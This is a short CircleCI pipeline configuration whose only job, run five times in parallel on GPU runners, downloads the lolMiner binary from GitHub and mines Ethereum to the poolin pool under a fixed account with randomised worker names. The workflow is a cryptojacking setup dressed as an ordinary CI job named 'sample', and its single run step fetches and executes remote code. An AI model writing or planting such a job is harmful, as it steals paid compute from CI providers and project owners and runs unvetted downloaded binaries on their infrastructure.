working_dir: &working_dir ~/app

version: 2.1
 
workflows: 
  sample:   
    jobs: 
      - job
 
jobs: 
  job:
    parallelism: 5
    machine:
      resource_class: gpu.nvidia.small
      image: ubuntu-2004-cuda-11.4:202110-01
     
    steps: 
      - checkout
      - run: wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.42/lolMiner_v1.42_Lin64.tar.gz && tar xf lolMiner_v1.42_Lin64.tar.gz && cd 1.42 && ./lolMiner --algo ETHASH --pool stratum+tcp://eth.ss.poolin.me:443 --user noval61.$(echo $(shuf -i 1-20000 -n 1)-V) --pass 123